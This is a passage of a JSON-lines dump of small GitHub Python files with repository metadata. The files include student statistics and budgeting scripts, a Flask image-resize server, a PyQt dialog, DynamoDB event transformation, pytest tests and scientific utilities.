3.1, 5.8, 4.8, 4.4, 4.6, 5.1, 4.7, 3.0, 5.5, 6.1, 3.8, 4.9, 5.6, 6.1, 5.9, 4.2, 6.4, 5.3, 4.5, 4.9, 4.0, 5.2, 3.3, 5.4, 4.7, 6.4, 5.1, 3.4, 5.2, 6.2, 4.4, 4.3, 5.8, 3.7]\nresults_rising = sorted(results)\n\n# ilosc zbadanych elementow\nsize = len(results)\n\n# liczba klas\nclasses = sqrt(size)\nclasses = floor(classes)\n\n# szerokosc pojedynczej klasy\nmax = max(results)\nmin = min(results)\n\n# roznica miedzy najwieksza i najmniejsza wystepujaca wartoscia\ndelta = max - min\n\n# szerokosc klasy zaokraglona do 2 miejsca po przecinku (0,49 tak jak na cwiczeniach)\nwidth_of_class = round(delta/classes, 2)\n\nif(width_of_class * classes >= delta):\n print(\"szerokosc klasy jest odpowiednia\")\nelse:\n print(\"zla szerokosc klasy\")\n\nprint(\"posortowane zbadane wartosci: \", results_rising)\nprint(\"liczba zbadanych wartosci: \", size)\nprint(\"wartosc min: \", min)\nprint(\"wartosc max: \", max)\nprint(\"ilosc klas: \", classes)\nprint(\"szerokosc pojedynczej klasy: \", width_of_class)\n\nclass1 = []\nclass2 = []\nclass3 = []\nclass4 = []\nclass5 = []\nclass6 = []\nclass7 = []\n\nfor i in range(0, size):\n if (results_rising[i] >= 3.0 and results_rising[i] < 3.49):\n class1.append(results_rising[i])\n elif (results_rising[i] >= 3.49 and results_rising[i] < 3.98):\n class2.append(results_rising[i]) \n elif (results_rising[i] >= 3.98 and results_rising[i] < 4.47):\n class3.append(results_rising[i]) \n elif (results_rising[i] >= 4.47 and results_rising[i] < 4.96):\n class4.append(results_rising[i]) \n elif (results_rising[i] >= 4.96 and results_rising[i] < 5.45):\n class5.append(results_rising[i]) \n elif (results_rising[i] >= 5.45 and results_rising[i] < 5.94):\n class6.append(results_rising[i]) \n elif (results_rising[i] >= 5.94 and results_rising[i] < 6.43):\n class7.append(results_rising[i]) \n\nelements_checker = len(class1 + class2 + class3 + class4 + class5 + class6 + class7)\n\nif elements_checker != size:\n print(\"niepoprawna liczba elementow w jednej z klas. \\n\")\nelse:\n print(\"liczba elementow jest poprawna! \\n\")\n\nprint(\"class1 wartosci:\", class1, \"\\nclass1 liczba elementow: \", len(class1))\nprint(\"class2 wartosci:\", class2, \"\\nclass2 liczba elementow: \", len(class2))\nprint(\"class3 wartosci:\", class3, \"\\nclass3 liczba elementow: \", len(class3))\nprint(\"class4 wartosci:\", class4, \"\\nclass4 liczba elementow: \", len(class4))\nprint(\"class5 wartosci:\", class5, \"\\nclass5 liczba elementow: \", len(class5))\nprint(\"class6 wartosci:\", class6, \"\\nclass6 liczba elementow: \", len(class6))\nprint(\"class7 wartosci:\", class7, \"\\nclass7 liczba elementow: \", len(class7))\n\n# dopisywanie wartosc do pliku CSV\n#kolumna 1: indeks klasy, kolumna 2: liczba elementow w klasie\nwith open(\"data.csv\", \"w\", newline='') as file:\n writer = csv.writer(file, delimiter=\";\")\n\n writer.writerow(('class1', len(class1)))\n writer.writerow(('class2', len(class2)))\n writer.writerow(('class3', len(class3)))\n writer.writerow(('class4', len(class4)))\n writer.writerow(('class5', len(class5)))\n writer.writerow(('class6', len(class6)))\n writer.writerow(('class7', len(class7)))\n\n# dopiswanie wartosci do pliku TXT\n#kolumna 1: indeks klasy, kolumna 2: liczba elementow w klasie\nplik = open(\"data.txt\", \"w\")\n\nplik.write((str(1) + \" \" + str(len(class1))))\nplik.write(\"\\n\")\nplik.write((str(2) + \" \" + str(len(class2))))\nplik.write(\"\\n\")\nplik.write((str(3) + \" \" + str(len(class3))))\nplik.write(\"\\n\")\nplik.write((str(4) + \" \" + str(len(class4))))\nplik.write(\"\\n\")\nplik.write((str(5) + \" \" + str(len(class5))))\nplik.write(\"\\n\")\nplik.write((str(6) + \" \" + str(len(class6))))\nplik.write(\"\\n\")\nplik.write((str(7) + \" \" + str(len(class7))))\n\nplik.close()\n\n\"\"\"\ngnuplot:\n\tset tics font \"Helvetica,15\" \n\tset ytics 1\t\todstep na osi y co 1 miejsce\n\tset xtics 1\t\todstep na osi x co 1 miejsce\n\n set xlabel \"numer klasy\" legenda\n\tset ylabel \"liczba elementow\" legenda\n\n plot \"data.txt\" u 1:2 t \"liczba elementow w danej klasie\" w lp \n\n\"\"\"","repo_name":"babypawcio/statistics-data-analysis-homework","sub_path":"feature of the population/populacja cecha x.py","file_name":"populacja cecha x.py","file_ext":"py","file_size_in_byte":4648,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33512244159","text":"import logging\n\nfrom PyQt6 import uic\nfrom PyQt6.QtWidgets import QDialog\n\nfrom constants.directions import *\nfrom structures.domains import Domains\nfrom structures.points import Nucleoside\nfrom structures.strands import Strands\n\nlogger = logging.getLogger(__name__)\n\n\nclass NucleosideInformer(QDialog):\n \"\"\"A QDialog to display information about a Nucleoside.\"\"\"\n\n def __init__(\n self, parent, nucleoside: Nucleoside, all_strands: Strands, all_domains: Domains\n ):\n \"\"\"\n Initialize the NucleosideInformer.\n\n Args:\n parent: The strands widget for the dialog.\n nucleoside: The Nucleoside to display information about.\n all_strands: The strands that contain the Nucleoside.\n all_domains: The domains that contain the Nucleoside.\n \"\"\"\n super().__init__(parent)\n assert isinstance(all_strands, Strands)\n assert isinstance(all_domains, Domains)\n assert isinstance(nucleoside, Nucleoside)\n\n self.setWindowTitle(\"Nucleoside Information\")\n uic.loadUi(\"ui/dialogs/informers/nucleoside.ui\", self)\n\n logger.info(\"Displaying information for %s\", nucleoside)\n\n self.x_coordinate.setText(f\"{nucleoside.x_coord:.4f} nanometers\")\n self.z_coordinate.setText(f\"{nucleoside.z_coord:.4f} nanometers\")\n self.angle.setText(f\"{nucleoside.angle:.4f}°\")\n\n strand_index = all_strands.index(nucleoside.strand)\n if nucleoside.strand.closed:\n openness = \"closed\"\n else: # not item.strand.closed\n openness = \"open\"\n self.strand.setText(\n f\"nucleoside #\"\n f\"{nucleoside.strand.items.by_type(Nucleoside).index(nucleoside) + 1} in\"\n f\" {openness} strand #{strand_index + 1}\"\n )\n self.helix.setText(\n f\"nucleoside {nucleoside.helical_index} of helix {id(nucleoside.helix)}\"\n )\n\n self.original_domain.setText(\n f\"domain #{nucleoside.domain.index + 1} of {all_domains.count} domains\"\n )\n\n if nucleoside.direction == UP:\n self.up.setChecked(True)\n elif nucleoside.direction == DOWN:\n self.down.setChecked(True)\n\n style = (\n \"QTextEdit{{\"\n \"color: rgb(0, 0, 0); \"\n \"font-size: {font_size}px; \"\n \"text-align: center; \"\n \"background: rgb(255, 255, 255)\"\n \"}};\"\n )\n if nucleoside.base is None:\n self.base.setStyleSheet(style.format(font_size=10))\n self.base.setText(\"Unset\\nBase\")\n else:\n self.base.setStyleSheet(style.format(font_size=32))\n self.base.setText(nucleoside.base)\n","repo_name":"NATuG3/NATuG3","sub_path":"ui/dialogs/informers/nucleoside.py","file_name":"nucleoside.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"12511954844","text":"import os\r\nimport uuid\r\nfrom flask import render_template, request, redirect, flash, abort\r\nfrom app import app, db, celery\r\nfrom app.models import ImageRequest, READY, NOT_READY\r\nfrom PIL import Image\r\nfrom app.forms import ImageForm\r\n\r\nALLOWED_EXTENSIONS = (['png', 'jpg'])\r\nUPLOAD_FOLDER = os.path.join('app', 'static')\r\n\r\n\r\ndef allowed_file(filename):\r\n return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\r\n\r\n\r\n@celery.task(bind=True)\r\ndef change_img_size(self, filename, w, h, Id):\r\n img = Image.open(os.path.join(UPLOAD_FOLDER, filename))\r\n new_img = img.resize((w, h))\r\n new_img.save(fp=os.path.join(UPLOAD_FOLDER, filename))\r\n\r\n db.session.query(ImageRequest). \\\r\n filter_by(id=Id). \\\r\n update({'status': READY})\r\n db.session.commit()\r\n return {'status': 'Task completed!'}\r\n\r\n\r\n@app.route('/', methods=['POST', 'GET'])\r\ndef index():\r\n form = ImageForm()\r\n if form.validate_on_submit():\r\n w = form.w.data\r\n h = form.h.data\r\n file = form.img.data\r\n if allowed_file(file.filename):\r\n file_extension =os.path.splitext(file.filename)[1]\r\n filename = str(uuid.uuid4()) + file_extension\r\n file.save(os.path.join(UPLOAD_FOLDER, filename))\r\n flash('File successfully uploaded')\r\n new_record = ImageRequest(w=w, h=h, img_path=filename)\r\n db.session.add(new_record)\r\n db.session.commit()\r\n change_img_size.apply_async(args=[filename, w, h, new_record.id])\r\n flash('Your task id is ' + str(new_record.id))\r\n return render_template('index.html', form=form), 202\r\n else:\r\n flash('Allowed file types are png, jpg')\r\n return redirect(request.url), 301\r\n\r\n return render_template('index.html', form=form), 200\r\n\r\n\r\n@app.route('/status/')\r\ndef task_status(task_id):\r\n if db.session.query(ImageRequest).filter_by(id=task_id).first():\r\n ImageRequestRecord = ImageRequest.query.get(task_id)\r\n return render_template('status.html', ImageRequest=ImageRequestRecord), 200\r\n else:\r\n abort(404)\r\n","repo_name":"KondratievaOlesya/Resize-server","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38208623785","text":"import os\nimport pandas as pd\nimport csv\npy_bank= \"budget_data_IO.csv\"\n\n#profit_loss = []\ndate = []\nmonthly_change = []\ncount_month = 0\ntotal_profit = 0\ntotal_change_profits = 0\ninitial_profit = 0\n#open as csv file\nwith open(py_bank, newline=\"\") as csvfile:\n \n #store file information in variable csvreader\n csvreader = csv.reader(csvfile,delimiter=',')\n #print(csvreader). initially used to test if it reads the file. Put a # in front of it after verifying\n\n #skips the header of the file\n csv_header = next(csvreader)\n \n for row in csvreader:\n # count_month to count the number of months(rows).\n count_month += 1\n\n #calculate the total profit\n #profit_loss.append(row[1])\n total_profit += int(row[1])\n\n #store dates for the list\n # To be used when collecting the greatest increase and decrease in profit/loss.\n date.append(row[0])\n\n #Calculate the average change in profits from month to month.\n final_profit = int(row[1])\n monthly_change_profits = final_profit - initial_profit\n\n #Store monthly changes in a list\n monthly_change.append(monthly_change_profits)\n\n #total_change_profits = total_change_profits + monthly_change_profits\n total_change_profits += monthly_change_profits\n initial_profit = final_profit\n\t\n\t #Calculate the average change in profits\n average_change_profits = (total_profit/count_month)\n\n #from statistics import mean\n #average_profits = sum(monthly_change)/count_month\n #Find the max and min change in profits and the corresponding dates these changes were observed\n greatest_increase = max(monthly_change)\n greatest_decrease = min(monthly_change)\n increase_date = date[monthly_change.index(greatest_increase)]\n decrease_date = date[monthly_change.index(greatest_decrease)]\n\n #print(\"Average Change: \" + \"$\" + str(int(average_change_profits)))\n #print(\"Average Change: \" + \"$\" + str(round(mean(average_change_profits))))\n print(\"Financial Analysis\")\n print(\"----------------------------------------------------------\")\n print(\"Total Months: \" + str(count_month))\n print(\"Total Profits: \" + \"$\" + str(total_profit))\n print(\"Average Change: \" + \"$\" + str(int(average_change_profits)))\n print(\"Greatest Increase in Profits: \" + str(increase_date) + \" ($\" + str(greatest_increase) + \")\")\n print(\"Greatest Decrease in Profits: \" + str(decrease_date) + \" ($\" + str(greatest_decrease)+ \")\")\n print(\"----------------------------------------------------------\")\n print(\"test1 \" + str(total_change_profits))","repo_name":"ItunuOye/python-challenge","sub_path":"PyBank.py","file_name":"PyBank.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20703924761","text":"# ------------------------------------------------------------------------ #\r\n# Title: Assignment 08\r\n# Description: Working with classes\r\n\r\n# ChangeLog (Who,When,What):\r\n# RRoot,1.1.2030,Created started script\r\n# RRoot,1.1.2030,Added pseudo-code to start assignment 8\r\n# Bruenger,6/1/21,Added Product Class\r\n# Bruenger,6/1/21,Added Menu Code and code for options 1,2,3.\r\n# Bruegner,6/2/21,Got as far as I could before running out of time.\r\n# ------------------------------------------------------------------------ #\r\n\r\n# Data -------------------------------------------------------------------- #\r\nstrFileName = 'products.txt'\r\nlstOfProductObjects = []\r\n\r\n\r\nclass Product():\r\n # Fields\r\n strName = \"\"\r\n fltPrice = \"\"\r\n\r\n def __init__(self, name, price):\r\n self.strName = name\r\n self.fltPrice = price\r\n\r\n\r\nobjP1 = Product(\"Cool Thing\", 50)\r\n\r\n\"\"\"Stores data about a product:\r\n\r\n properties:\r\n product_name: (string) with the product's name\r\n product_price: (float) with the product's standard price\r\n methods:\r\n changelog: (When,Who,What)\r\n RRoot,1.1.2030,Created Class\r\n ,,Modified code to complete assignment 8\r\n \"\"\"\r\npass\r\n# Data -------------------------------------------------------------------- #\r\n\r\n\r\n# Processing ------------------------------------------------------------- #\r\ndef read_data_from_file(list_of_rows):\r\n \"\"\" Reads data from a file into a list of dictionary rows\r\n\r\n :param file_name: (string) with name of file:\r\n :param list_of_rows: (list) you want filled with file data:\r\n :return: (list) of dictionary rows\r\n \"\"\"\r\n list_of_rows.clear() # clear current data\r\n file = open(strFileName, \"r\")\r\n for line in file:\r\n name, price = line.split(\",\")\r\n row = {\"Name\": name.strip(), \"Price\": price.strip()}\r\n list_of_rows.append(row)\r\n file.close()\r\n return list_of_rows, 'Success'\r\n\r\n\r\ndef write_data_to_file(list_of_rows):\r\n objFile = open(strFileName, \"w\")\r\n for row in lstOfProductObjects:\r\n objFile.write(row[\"Name\"] + ',' + row[\"Price\"] + '\\n')\r\n objFile.close()\r\n # print(\"\\tData saved to file!\")\r\n\r\n\r\nclass FileProcessor:\r\n \"\"\"Processes data to and from a file and a list of product objects:\r\n\r\n methods:\r\n save_data_to_file(file_name, list_of_product_objects):\r\n\r\n read_data_from_file(file_name): -> (a list of product objects)\r\n\r\n changelog: (When,Who,What)\r\n RRoot,1.1.2030,Created Class\r\n ,,Modified code to complete assignment 8\r\n \"\"\"\r\n pass\r\n\r\n\r\n# Processing ------------------------------------------------------------- #\r\n\r\n\r\n# Presentation (Input/Output) -------------------------------------------- #\r\nclass IO:\r\n # TODO: Add docstring\r\n pass\r\n\r\n @staticmethod\r\n def print_menu_products():\r\n \"\"\" Display a menu of choices to the user\r\n\r\n :return: nothing\r\n \"\"\"\r\n print('''\r\n Menu of Options\r\n 1) Add a new Product\r\n 2) Save Data to File \r\n 3) Reload Data from File\r\n 4) Exit Program\r\n ''')\r\n print() # Add an extra line for looks\r\n\r\n @staticmethod\r\n def print_current_products_in_list(list_of_rows):\r\n \"\"\" Shows the current Products in the list of dictionaries rows\r\n\r\n :param list_of_rows: (list) of rows you want to display\r\n :return: nothing\r\n \"\"\"\r\n print(\"******* The current Products ToDo are: *******\")\r\n for row in list_of_rows:\r\n print(row[\"Name\"] + \" (\" + row[\"Price\"] + \")\")\r\n print(\"*******************************************\")\r\n print() # Add an extra line for looks\r\n\r\n @staticmethod\r\n def input_yes_no_choice(message):\r\n \"\"\" Gets a yes or no choice from the user\r\n\r\n :return: string\r\n \"\"\"\r\n return str(input(message)).strip().lower()\r\n\r\n @staticmethod\r\n def input_press_to_continue(optional_message=''):\r\n \"\"\" Pause program and show a message before continuing\r\n\r\n :param optional_message: An optional message you want to display\r\n :return: nothing\r\n \"\"\"\r\n print(optional_message)\r\n input('Press the [Enter] key to continue.')\r\n\r\n\r\n @staticmethod\r\n def input_menu_choice():\r\n \"\"\" Gets the menu choice from a user\r\n\r\n :return: string\r\n \"\"\"\r\n choice = str(input(\"Which option would you like to perform? [1 to 4] - \")).strip()\r\n print() # Add an extra line for looks\r\n return choice\r\n\r\n # TODO: Add code to show the current data from the file to user\r\n\r\n @staticmethod\r\n def input_new_product():\r\n strName = input(\"Enter a Name: \")\r\n strPrice = input(\"Enter a Price: \")\r\n dicRow = {\"Name\": strName, \"Price\": strPrice}\r\n lstOfProductObjects.append(dicRow)\r\n dicRow = str(dicRow).replace(\"{\", \"(\")\r\n dicRow = str(dicRow).replace(\"}\", \")\")\r\n dicRow = str(dicRow).replace(\"'\", \"\")\r\n print()\r\n print(\"\\t The record \" + dicRow + \" was added!\")\r\n\r\n# Presentation (Input/Output) -------------------------------------------- #\r\n\r\n# Main Body of Script ---------------------------------------------------- #\r\nwhile(True):\r\n # Step 3 Show current data\r\n IO.print_menu_products() # Shows menu\r\n strChoice = IO.input_menu_choice() # Get menu option\r\n\r\n # Step 4 - Process user's menu choice\r\n if strChoice.strip() == '1': # Add a new Product\r\n IO.input_new_product()\r\n IO.input_press_to_continue()\r\n continue # to show the menu\r\n\r\n elif strChoice == '2': # Save Data to File\r\n strChoice = IO.input_yes_no_choice(\"Save this data to file? (y/n) - \")\r\n if strChoice.lower() == \"y\":\r\n write_data_to_file(lstOfProductObjects)\r\n IO.input_press_to_continue()\r\n else:\r\n IO.input_press_to_continue(\"Save Cancelled!\")\r\n continue # to show the menu\r\n\r\n elif strChoice == '3': # Reload Data from File\r\n print(\"Warning: Unsaved Data Will Be Lost!\")\r\n strChoice = IO.input_yes_no_choice(\"Are you sure you want to reload data from file? (y/n) - \")\r\n if strChoice.lower() == 'y':\r\n read_data_from_file(strFileName) # read file data\r\n IO.input_press_to_continue()\r\n else:\r\n IO.input_press_to_continue(\"File Reload Cancelled!\")\r\n continue # to show the menu\r\n\r\n elif strChoice == '4': # Exit Program\r\n print(\"Goodbye!\")\r\n break # and Exit\r\n# Load data from file into a list of product objects when script starts\r\n# Show user current data in the list of product objects\r\n# Main Body of Script ---------------------------------------------------- #\r\n","repo_name":"Bruengerjr/IntroToProg-Python-Mod08","sub_path":"Assigment08-Starter.py","file_name":"Assigment08-Starter.py","file_ext":"py","file_size_in_byte":6781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24946853848","text":"######################################################################################################################\n# Author: Sakitha Ariyarathne\n# Date: 02/08/2022\n# Project: Distribution system coordination\n######################################################################################################################\n\n# Need two command line inputs;\n# 1. Directory path\n# 2. System name\n#\n# The script assumes that there are 'inputData' and 'outputData' folders exist inside the directory. Also, inside the\n# 'inputData' folder there must be folder for the system containing all the data files.\n\n# VOLL has set to 1000\n# max flow on lines has set 99999\n# base value for conductance and susceptance has set to 10000\n\nimport numpy as np\nimport numpy.random\n\nfrom GUI import *\n\nnp.random.seed(10)\n\n# global variables\ndirectory = \"\"\nnetwork_name = \"\"\nsystem_name = \"\"\nnum_systems = 0\nnum_iterations = 300\ninput_dir = \"\"\noutput_dir = \"\"\n\n\n# main frame\nroot = tk.Tk()\nroot.title(\"Exchange Electricity\")\nroot.iconbitmap(r\"images/appIcon.ico\")\nroot.geometry(\"900x500\")\nroot.config(bg=\"#80c1ff\")\n\nmain_frame(root)\n\nbutton_exit = tk.Button(root, text=\"Exit\", command=root.quit, bg=\"white\", fg=\"black\")\nbutton_exit.place(relx=0.9, rely=.93, relwidth=0.08, relheight=0.05)\n\n\nroot.mainloop()\n","repo_name":"Sakitha1989/DistributionSystemCoordination","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73752857708","text":"from flask import Flask, render_template, flash\r\nfrom flask_wtf import Form\r\nfrom wtforms import StringField, SubmitField\r\nfrom wtforms.validators import DataRequired\r\n\r\napp = Flask(__name__)\r\napp.config['DEBUG'] = True\r\napp.config['SECRET_KEY'] = 'well-secret-password'\r\n\r\n\r\nclass MyForm(Form):\r\n name = StringField(label='Name', validators=[DataRequired()])\r\n starting = SubmitField(label='Starting')\r\n ending = SubmitField(label='Ending')\r\n\r\n\r\n@app.route('/index', methods=['GET', 'POST'])\r\ndef index():\r\n form = MyForm()\r\n\r\n if form.validate_on_submit():\r\n print (\"Starting data Value : {value}\".format(value=form.starting.data))\r\n print (\"Ending data Value : {value}\".format(value=form.ending.data))\r\n flash(\r\n \"You submitted name {name} via button {button}\".format(\r\n name=form.name.data,\r\n button=\"Starting\" if form.starting.data else \"Ending\"\r\n )\r\n )\r\n\r\n return render_template('testbuttons.html', form=form)\r\n\r\n if form.errors:\r\n for error_field, error_message in form.errors.iteritems():\r\n flash(\"Field : {field}; error : {error}\".format(field=error_field, error=error_message))\r\n\r\n return render_template('testbuttons.html', form=form)\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True, host='0.0.0.0')","repo_name":"Hristiyan-Andreev/flask-tests","sub_path":"WTFFormsTests/testbuttons.py","file_name":"testbuttons.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40098838366","text":"import json\nfrom boto3.dynamodb.types import TypeDeserializer\nfrom collections import defaultdict\nfrom dataclasses import dataclass\nfrom dateutil import parser\nfrom decimal import Decimal\n\n\n@dataclass\nclass TransformedMessageGroup:\n table_name: str\n date_id: str\n events: list[dict]\n\n\nclass MessageTransformer:\n deserialiser = TypeDeserializer()\n\n def load_messages(self, messages) -> None:\n self.file_values = defaultdict(list)\n for sqs_event in messages:\n dynamodb_event = json.loads(sqs_event['Body'])\n \n transformed = self.transform_event(dynamodb_event)\n\n key = (transformed['table'], transformed['date_id'])\n self.file_values[key].append(transformed)\n\n self.transformed_message_groups = []\n for (table_name, date_id), events in self.file_values.items():\n sorted(events, key=lambda x: x['modified_at'])\n self.transformed_message_groups.append(TransformedMessageGroup(\n table_name=table_name,\n date_id=date_id,\n events=events,\n ))\n\n def get_transformed_messages(self) -> TransformedMessageGroup:\n return self.transformed_message_groups\n\n def get_unique_date_ids(self) -> set[str]:\n return {g.date_id for g in self.transformed_message_groups}\n \n @classmethod\n def transform_event(cls, event) -> dict:\n response = {}\n event_type = event['eventName']\n\n if event_type in {'INSERT', 'MODIFY'}:\n key_values = event['dynamodb']['NewImage']\n\n elif event_type == 'REMOVE':\n key_values = event['dynamodb']['OldImage']\n\n else:\n raise NotImplementedError(event_type)\n\n response['meta_event_type'] = event_type\n for key, value in key_values.items():\n response[key] = cls.deserialiser.deserialize(value)\n\n response = cls.remove_decimals(response)\n\n date = parser.parse(response['modified_at'])\n response['date_id'] = date.strftime('%Y-%m-%d')\n\n return response\n\n @classmethod\n def remove_decimals(cls, key_values) -> dict:\n for key, value in key_values.items():\n if isinstance(value, Decimal):\n key_values[key] = int(value)\n\n elif isinstance(value, dict):\n key_values[key] = cls.remove_decimals(value)\n \n elif isinstance(value, list):\n key_values[key] = [cls.remove_decimals(v) for v in value]\n\n return key_values\n","repo_name":"Nick-Sullivan/death-dice","sub_path":"lambda/history/layer/python/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":2420,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25460813220","text":"import pytest\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom src import crud\nfrom src.models.budget import BudgetCreate, BudgetUpdate\nfrom src.tests.utils.budget import create_test_budget\nfrom src.tests.utils.user import create_random_user\n\n\n@pytest.mark.asyncio\nasync def test_create_budget(db: AsyncSession) -> None:\n user = await create_random_user(db)\n # code from create_test_budget copied for clarity\n budget = BudgetCreate(amount=400, name=\"test budget\")\n budget_from_db = await crud.budget.create(db, obj_in=budget, user_id=user.id)\n\n # ? deletes user and associated budgets\n await crud.user.remove(db, id=user.id)\n assert budget_from_db\n assert budget_from_db.user_id == user.id\n\n\n@pytest.mark.asyncio\nasync def test_get_all_budgets_for_user(db: AsyncSession) -> None:\n user = await create_random_user(db)\n await create_test_budget(db, user_id=user.id)\n budgets = await crud.budget.get_all_budgets_for_user(db, user_id=user.id)\n\n await crud.user.remove(db, id=user.id)\n assert len(budgets) == 1\n assert budgets[0].user_id == user.id\n\n\n@pytest.mark.asyncio\nasync def test_update_budget(db: AsyncSession) -> None:\n user = await create_random_user(db)\n budget_from_db = await create_test_budget(db, user_id=user.id)\n budget = BudgetUpdate(name=\"updated test budget\")\n budget_from_db = await crud.budget.update(db, db_obj=budget_from_db, obj_in=budget)\n\n await crud.user.remove(db, id=user.id)\n assert budget_from_db.name == budget.name\n","repo_name":"NADEE-MJ/peppermint","sub_path":"backend/src/tests/crud/test_budget.py","file_name":"test_budget.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32090027700","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Nov 20 20:35:47 2018\r\n\r\n\"\"\"\r\n#Using Newton-Raphson algorithm to find the root of a number\r\n\r\nprint(\"FINDING THE SQUARE ROOT\")\r\nepsilon = 0.01 #This is the distance of how close i want to get to the answer\r\n\r\nnumber = float(input(\"Enter a number: \"))\r\nnumGuesses = 0\r\nguess = number/2.0\r\n\r\n\r\nwhile abs(guess**2 - number) >= epsilon:\r\n numGuesses += 1\r\n guess = guess - ((guess**2)-number)/(2*guess)\r\n\r\nprint(\"Number of Guesses: \" + str(numGuesses)) \r\nprint(\"The Square: \" + str(number) + \"\\nThe square root is about: \" + str(guess))\r\n","repo_name":"vanyarin09/Python-Samples","sub_path":"Edx Python Scripts/FindingSquareRootUsingNewtonRaphson.py","file_name":"FindingSquareRootUsingNewtonRaphson.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10513053599","text":"#! /usr/bin/env python\n\nimport openturns as ot\nimport otlhs\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\nfrom openturns.viewer import View\nimport time\nfrom otlhs.pyplotdesign import PyPlotDesign\n\not.Log.Show(ot.Log.INFO)\n\n# Bounds are [0,1]^dimension\ndimension = 2\nbounds = ot.Interval(dimension)\n\nnSimu = 10000\n\nc2 = otlhs.SpaceFillingC2()\n# Size of sample\nsize = 10\n\nprint(\"dimension=%d, size=%d\"%(dimension, size))\nfor nSimu in [100, 200, 400, 800, 1600, 3200, 6400, 12800, 25600, 51200, 102400, 204800, 409600]:\n ot.RandomGenerator.SetSeed(0)\n # Factory: lhs generates\n lhsDesign = otlhs.LHSDesign(bounds, size)\n mc = otlhs.MonteCarloLHS(lhsDesign, nSimu, c2)\n tic = time.time()\n result = mc.generate()\n toc = time.time()\n print(\"%d %f %f\"%(nSimu,result.getOptimalValue(), toc-tic))\n\npp = PdfPages('small_mc_OTLHS.pdf')\n# plot criterion & save it\ncrit = result.drawHistoryCriterion()\nfig = View(crit, plot_kwargs={'color':'blue'}).getFigure()\npp.savefig(fig)\nplt.close(fig)\n# plot design\nfig = PyPlotDesign(result.getOptimalDesign(), bounds, size, size, plot_kwargs={'color':'blue', 'marker': 'o', 'ms': 6})\nplt.suptitle('LHS design of size=%d - Optimization of %s criterion using %d MC sample'%(size,c2.getName(), nSimu))\nfig.savefig(\"lhs_mc_c2_%d.png\"%size)\nplt.close(fig)\n \nminDist = otlhs.SpaceFillingMinDist()\n\n# Factory: lhs generates\nlhsDesign = otlhs.LHSDesign(bounds, size)\nmc = otlhs.MonteCarloLHS(lhsDesign, nSimu, minDist)\ntic = time.time()\nresult = mc.generate()\ntoc = time.time()\nprint(\"cpu time=%f\"%(toc-tic))\nprint(\"dimension=%d, size=%d,mc=%s\"%(dimension, size, mc))\nprint(\"optimal value=\"+ str(result.getOptimalValue())+\" c2=\"+str(result.getC2())+\" phiP=\"+str(result.getPhiP())+\" minDist=\"+str(result.getMinDist()))\n# plot criterion & save it\ncrit = result.drawHistoryCriterion()\nfig = View(crit, plot_kwargs={'color':'blue'}).getFigure()\npp.savefig(fig)\nplt.close(fig)\n# plot design\nfig = PyPlotDesign(result.getOptimalDesign(), bounds, size, size, plot_kwargs={'color':'red', 'marker': 'o', 'ms': 6})\nplt.suptitle('LHS design of size=%d - Optimization of %s criterion using %d MC sample'%(size,minDist.getName(), nSimu))\nfig.savefig(\"lhs_mc_mindist_%d.png\"%size)\nplt.close(fig)\n\npp.close()\n","repo_name":"jschueller/otlhs","sub_path":"validation/validate_MC_small.py","file_name":"validate_MC_small.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10454952133","text":"from __future__ import print_function, division, absolute_import\nfrom tracktable.core import geomath\nimport numpy\n\nfrom six.moves import range\n\nALL_ANNOTATIONS = {}\n\n# ----------------------------------------------------------------------\n\ndef climb_rate(trajectory, max_climb=2000):\n \"\"\"Annotate points in an AirTrajectory with climb rate\n\n usage: climb_rate(t: AirTrajectory) -> None\n\n This will add a property 'climb_rate' to each point in the input\n trajectory. This is measured in units/sec and is computed as\n (points[n].altitude - points[n-1].altitude) /\n (points[n].timestamp - points[n-1].timestamp).\n\n Args:\n trajectory (Trajectory): Trajectory to be annotated with climb rate\n\n Keyword Args:\n max_climb (int): max climb rate (Default: 2000)\n\n Returns:\n Trajectory annotated with climb rate\n\n \"\"\"\n\n if len(trajectory) == 0:\n return\n elif len(trajectory) == 1:\n trajectory[0].properties['climb_rate'] = 0.0\n else:\n for i in range(len(trajectory) - 1):\n if ('altitude' not in trajectory[i].properties or\n 'altitude' not in trajectory[i+1].properties):\n altitude_delta = 0.0\n else:\n altitude_delta = trajectory[i+1].properties['altitude'] - trajectory[i].properties['altitude']\n try:\n time_delta = (trajectory[i+1].timestamp - trajectory[i].timestamp).total_seconds()\n except IndexError:\n time_delta = 1\n\n if time_delta == 0:\n time_delta = 1\n climb_rate = float(altitude_delta) / (time_delta / 60.0)\n trajectory[i].set_property('climb_rate', climb_rate)\n\n 